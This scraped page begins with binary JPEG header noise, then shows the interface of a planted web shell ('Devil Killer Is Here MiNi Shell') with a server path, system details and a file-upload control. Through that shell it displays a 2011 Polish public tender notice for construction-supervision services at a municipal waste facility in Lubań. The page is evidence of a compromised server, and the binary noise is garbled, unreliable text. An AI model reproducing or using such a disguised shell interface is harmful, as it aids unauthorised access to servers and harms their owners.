JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110502/128117-N-2011.html

<p class="kh_header"><b>Lubań: PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO  W RAMACH PROJEKTU PN.BUDOWA INSTALACJI MECHANICZNEJ OBRÓBKI ODPADÓW KOMUNALNYCH ORAZ WYKONANIE DRUGIEGO ETAPU USZCZELNIENIA KWATERY W CENTRUM UTYLIZACJI ODPADÓW GMIN ŁUŻYCKICH W LUBANIU.</b><br>
<b>Numer ogłoszenia: 128117 - 2011; data zamieszczenia: 02.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki i Usług Komunalnych Sp. z o.o. , ul. Lwówecka 8, 59-800 Lubań, woj. dolnośląskie, tel. 075 7222229, 7222329, faks 075 7224633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgiuk.luban.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością - 100% własności Gminy Miejskiej Lubań.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO  W RAMACH PROJEKTU PN.BUDOWA INSTALACJI MECHANICZNEJ OBRÓBKI ODPADÓW KOMUNALNYCH ORAZ WYKONANIE DRUGIEGO ETAPU USZCZELNIENIA KWATERY W CENTRUM UTYLIZACJI ODPADÓW GMIN ŁUŻYCKICH W LUBANIU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOTEM ZAMÓWIENIA JEST PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W RAMACH PROJEKTU PN. BUDOWA INSTALACJI MECHANICZNEJ OBRÓBKI ODPADÓW KOMUNALNYCH ORAZ WYKONANIE DRUGIEGO ETAPU USZCZELNIENIA KWATERY W CENTRUM UTYLIZACJI ODPADÓW GMIN ŁUŻYCKICH W LUBANIU.Wykonawca będzie pełnił funkcję Inspektora nadzoru inwestorskiego określoną wart. 25 Prawa budowlanego w okresie realizacji robót budowlanych i w okresie gwarancji udzielonej przez wykonawcę robót. 
Przedmiot zadania inwestycyjnego na terenie CENTRUM UTYLIZACJI ODPADÓW GMIN ŁUŻYCKICH w Lubaniu przy ul. Bazaltowej 1 obejmuje wykonanie .
	Budowę linii do prasowania surowców wtórnych w istniejącym budynku sortowni, w tym:
	kanału technologicznego przenośnika zasilającego prasę kanałową,
	zmianę konstrukcji osłonowej ściany wschodniej budynku 
	zabudowę dodatkowej bramy w budynku, 
	zabudowę urządzeń linii technologicznej prasowania surowców wtórnych,
	adaptację istniejącej wiaty dla magazynowania sprasowanej makulatury,
	wykonanie zasilania elektrycznego urządzeń,
	doprowadzenie rurociągu wody do budynku i zabudowę hydrantu wewnętrznego,
	modernizację istniejących instalacji w zakresie:
-	modernizacji słupowej stacji transformatorowej,
-	przełożenia  odcinka kanalizacji sanitarnej w budynku, 
	Budowę drugiej  kwatery składowiska odpadów komunalnych
	Budowę zbiornika retencyjnego odcieków
	Budowę linii sortowniczej komunalnych odpadów zmieszanych, w tym:
	leja załadowczego z zadaszeniem dla przenośnika kanałowego,
	boksu magazynowania komunalnych odpadów zmieszanych,
	boksów magazynowania wydzielonych frakcji odpadów lub odpadów z selektywnej zbiórki,
	płyty fundamentowej urządzeń linii sortowniczej,
	placów wewnętrznych,
	zasilania energią elektryczną obiektów, oświetlenia technologicznego terenu,
	wykonania doprowadzenia wody i przyłączy dla instalacji zraszającej, 
	modernizacji zewnętrznej kanalizacji deszczowej i sanitarnej z zabudową pompowni ścieków, modernizacji wodociągu.
	zabudowy urządzeń i wyposażenia linii sortowniczej komunalnych odpadów.
Zakres prac Inspektora Nadzoru Inwestorskiego 
a)	pełnienie profesjonalnego, kompletnego nadzoru inwestorskiego nad prowadzonymi robotami z wykorzystaniem ewentualnego personelu  w niezbędnej liczbie do sprawnego i płynnego realizowania Umowy oraz koordynacji poszczególnych robót budowlanych;
b)	zapoznanie się z posiadaną przez Zamawiającego dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót dotyczącymi przedmiotowego zadania, pozwoleniami i uzgodnieniami oraz zweryfikowania dokumentacji pod względem zgodności rozwiązań z obowiązującymi przepisami prawa i zasadami współczesnej wiedzy technicznej oraz przedstawienie na piśmie ewentualnych uwag i propozycji zmian;
c)	zapoznanie się z obowiązującym stanem prawnym dotyczącym prawa krajowego i wspólnotowego w zakresie zawierającym unormowania dotyczące Europejskiego Funduszu Rozwoju Regionalnego oraz umową o dofinansowanie.
d)	wydawanie wykonawcy robót, kierownikowi budowy i lub kierownikom robót poleceń potwierdzonych wpisem w dzienniku budowy, dotyczących usunięcia nieprawidłowości lub zagrożeń , wykonania prób lub badań, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych
e)	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, pozwoleniem na budowę, przepisami prawa, zasadami wiedzy technicznej oraz wymaganiami umowy na roboty budowlane;
f)	koordynowanie prac realizowanych przez wykonawcę oraz monitorowanie realizacji pod względem technicznym, finansowym i organizacyjnym oraz zgodności z harmonogramem rzeczowo-finansowym w ramach współpracy z Koordynatorami Projektu - Koordynator projektu i Koordynator realizacji inwestycji- ;
g)	przeprowadzanie regularnych inspekcji placu budowy( co najmniej raz w tygodniu) , sprawdzających jakość wykonywanych robót, przestrzeganie przepisów dot. bezpieczeństwa, zgodności postępowania z umową na wykonanie robót oraz sporządzanie pisemnych raportów dla Zamawiającego;
h)	zatwierdzanie materiałów budowlanych i instalacyjnych oraz urządzeń jakie mają być wbudowane zgodnie z dokumentacją projektową; sprawdzanie jakości i prawidłowości dokumentów, zezwoleń, aprobat technicznych, deklaracji zgodności itd. w celu uniknięcia użycia materiałów wadliwych ;
i)	nadzór nad Wykonawcą robót budowlanych w zakresie przestrzegania i stosowania przepisów prawa , a w szczególności przepisów Prawa budowlanego, Prawa ochrony środowiska, Ustawy o odpadach oraz przepisów Bezpieczeństwa i Higieny Pracy i Ochrony ppoż
j)	sprawdzanie  harmonogramów rzeczowo-finansowych sporządzonych przez wykonawcę robót;
k)	ścisła współpraca z  osobami pełniącymi nadzór autorski oraz innymi instytucjami, których udział w realizacji Zadania okaże się niezbędny , w tym w szczególności z Koordynatorem realizacji inwestycji;
l)	żądanie od wykonawcy robót, kierownika budowy i lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdy ich kontynuacja mogłaby wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową i lub pozwoleniem na budowę;
m)	monitorowanie postępu prac, włącznie ze składaniem z nich raportów ;
n)	szacowanie, weryfikacja i ewidencja ewentualnych robót zamiennych,  a także nadzór nad ich realizacją,
o)	udział w przygotowaniu i ocena niezbędnych opinii, ekspertyz i dokumentacji na roboty, tymczasowe;
p)	weryfikacja i analiza rysunków wykonawczych sporządzanych przez wykonawców robót oraz  sporządzenie opinii dla Zamawiającego; 
q)	organizowanie, cyklicznych narad koordynacyjnych z udziałem przedstawicieli wykonawcy robót, Zamawiającego , Koordynatorów Projektu i Inspektora nadzoru na placu budowy co najmniej raz w miesiącu, a jeśli zajdzie potrzeba lub na życzenie Zamawiającego w innym cyklu. 
r)	informowanie Zamawiającego o wszystkich problemach zaistniałych i mogących zaistnieć, razem ze sposobami ich rozwiązania oraz uzgodnienie z Zamawiającym wszelkich zmian dotyczących organizacji robót i materiałów,
s)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych  oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania , w tym: 
 - sprawdzanie i odbiór robót ulegających zakryciu lub zanikających - w terminie do 2 dni roboczych od daty otrzymania zgłoszenia poprzez wpis do dziennika budowy, 
- sprawdzanie i odbiór skończonych elementów robót, podlegających odbiorowi czę-ściowemu - w terminie do 5 dni roboczych od daty otrzymania zgłoszenia poprzez wpis do dziennika budowy, 
- sprawdzenie i odbiór robót objętych odbiorem końcowym - w terminie do 7 dni roboczych od daty wpisu o zakończeniu przedmiotu umowy potwierdzenie w dzienniku budowy osiągnięcia gotowości do odbioru, 
t)	kontrole ewentualnych badań laboratoryjnych,
u)	kontrola prawidłowości  prac pomiarowych, 
v)	egzekwowanie opracowania przez Wykonawcę robót instrukcji eksploatacji i konserwacji urządzeń oraz dostarczenie jej w uzgodnionej ilości egz. do Zamawiającego;
w)	prowadzenie dokumentacji budowy wraz z dokumentacją fotograficzną budowy,
x)	przegląd, ocena kompletności oraz zgodności dokumentacji powykonawczej ze stanem istniejącym i dostarczenie jej do Zamawiającego w uzgodnionej formie i ilości;
y)	organizowanie, nadzorowanie i koordynowanie dodatkowych testów jakości przez specjalistyczne instytucje, jeżeli będzie to niezbędne;
z)	w porozumieniu z Koordynatorami Projektu rozliczenie rzeczowe i finansowe robót budowlanych;
aa)	obliczanie wysokości kar umownych z tytułu niewykonania lub nienależytego wykonania umowy na roboty;
bb)	stwierdzenie kompletności i prawidłowości dokumentów odbiorowych złożonych przez Wykonawcę robót,
cc)	skompletowanie niezbędnych dokumentów i przygotowanie wniosku o udzielenie pozwolenia na użytkowanie;
dd)	sprawowanie nadzoru nad czynnościami wykonawcy robót, wynikającymi z warunków gwarancji i rękojmi na wykonane roboty;
ee)	w porozumieniu z Koordynatorem realizacji inwestycji prowadzenie , przechowywanie i archiwizowanie korespondencji i wszelkich dokumentów ze szczególnym uwzględnieniem wpisów do dziennika budowy, ostrzeżeń, uwag i wniosków, które mogą być dowodami w razie ewentualnych sporów, roszczeń wykonawcy robót, katastrof budowlanych, itp.;
ff)	sporządzenie protokołów przekazania-przyjęcia środków trwałych  OT- zgodnie z wytycznymi Zamawiającego i przekazanie ich Zamawiającemu w ciągu  15 dni od daty wydania Protokołu odbioru robót;
gg)	wszystkie inne czynności i zadania nie wymienione, które okażą się konieczne do prawidłowej realizacji umów na roboty budowlane, wykonania planowanych efektów zadania oraz zabezpieczenie interesów Zamawiającego, 
hh)	wykonywanie swoich obowiązków w ścisłej współpracy z Zamawiającym oraz jego przedstawicielami w ramach Koordynacji projektu , zgodnie z jego poleceniami, obowiązującymi przepisami oraz regulacjami stosowanymi dla projektów współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Rozwoju Regionalnego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:

a)	oświadczenie o spełnienie warunków udziału w postępowaniu.
Ocena spełnienia w/w warunku  udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez
wykazanie, że w okresie ostatnich 3 lat przed upływem terminu składania ofert
(a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali lub jest wykonywana usługa należycie , co najmniej jedna usługa dla każdego prowadzenia nadzoru inwestorskiego .  

Warunek będzie spełniony jeżeli Wykonawca wykaże, że zakres usług wykazanych
przez Wykonawcę obejmował pełnienie obowiązków inspektora nadzoru inwestorskiego  związanego  z: 
Inspektorem  nadzoru inwestorskiego w specjalności konstrukcyjno-budowlanej posiadającego :
-	wykształcenie wyższe techniczne;
-	uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności budowlano-konstrukcyjnej bez ograniczeń,
-	min. 2-letnie doświadczenie zawodowe na stanowisku inspektora nadzoru zdobyte przy realizacji co najmniej 1 zadania o wartości co najmniej 1 000 000 zł brutto .
- Podwykonawcy- 
Inspektorem nadzoru robót w specjalności w zakresie ochrony środowiska lub w zakresie budownictwa hydrotechnicznego posiadającego:
-	wykształcenie wyższe techniczne;
-	uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno-inżynieryjnej w zakresie budownictwa hydrotechnicznego lub w zakresie instalacyjno-inżynieryjnej w zakresie ochrony środowiska, 
-	min. 2-letnie doświadczenie zawodowe na stanowisku inspektora nadzoru zdobyte przy realizacji co najmniej 1 zadania dotyczących wykonania uszczelnień kwater składowiska odpadów lub budowy zbiornika retencyjnego ,
Inspektorem  nadzoru robót w specjalności elektrycznej  posiadającego:
-	wykształcenie wyższe techniczne;
-	uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.
-	min. 2-letnie doświadczenie zawodowe na stanowisku inspektora nadzoru zdobyte przy realizacji co najmniej 1 zadania dotyczących sieci elektrycznych  w ramach przebudowy stacji transformatorowych .

 
Ocena spełnienia ww warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:

a) wykaz usług  w zakresie niezbędnym do wykazania spełnienia
warunku -wiedzy i doświadczenia- sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika do SIWZ ,

b) dokumenty potwierdzające, że wymienione w wykazie usługi zostały wykonane lub są wykonane należycie ,

c) oświadczenie o spełnieniu warunków udziału w postępowaniu,

Ocena spełnienia w/w warunku  udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenie  złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:

a)	oświadczenie o spełnienie warunków udziału w postępowaniu.
Ocena spełnienia w/w warunku  udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie niżej wymienionymi osobami,
które będą uczestniczyć w wykonywaniu zamówienia  :
- Inspektorem  nadzoru inwestorskiego :  jedną osobą, posiadającą aktualne uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń .
- Inspektorem nadzoru robót w specjalności w zakresie ochrony środowiska lub w za-kresie budownictwa hydrotechnicznego kierownikiem robót:
jedną osobą, posiadającą aktualne uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjno-inżynieryjnej w zakresie ochrony środowiska  lub 
jedną osobą, posiadającą aktualne uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno -inżynieryjnej w zakresie  budownictwa  hydrotechnicznego.
-Inspektorem  nadzoru robót w specjalności elektrycznej  : jedną osobą, posiadającą aktual-ne uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń .
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:

a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia,
w szczególności odpowiedzialnych za prowadzenie nadzoru nad  robotami  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykona-nia
zamówienia oraz informacją o podstawie do dysponowania tymi osobami - sporządzony przez
Wykonawcę samodzielnie lub z wykorzystaniem załącznika do SIWZ,

b) oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia
(wymienione w wykazie osoby) posiadają wymagane uprawnienia ,

c) oświadczenie o spełnieniu warunków udziału w postępowaniu,

Ocena spełnienia w/w warunku  udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenie złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:
a)	oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia w/w warunku  udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art.144 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy dotyczących :
zmiany  terminu wykonania zamówienia realizacji robót:
a) w przypadku zlecenia robót zamiennych,
b) spowodowane warunkami atmosferycznymi, w szczególności klęskami
żywiołowymi, warunkami atmosferycznymi uniemożliwiającymi prowadzenie
robót budowlanych, zgodnie z wymogami technologicznymi,
c) spowodowane koniecznością usunięcia błędów lub wprowadzenia zmian
w dokumentacji projektowej,
d) spowodowane innymi przyczynami zewnętrznymi niezależnymi od
zamawiającego i wykonawcy skutkujące niemożliwością uzyskania
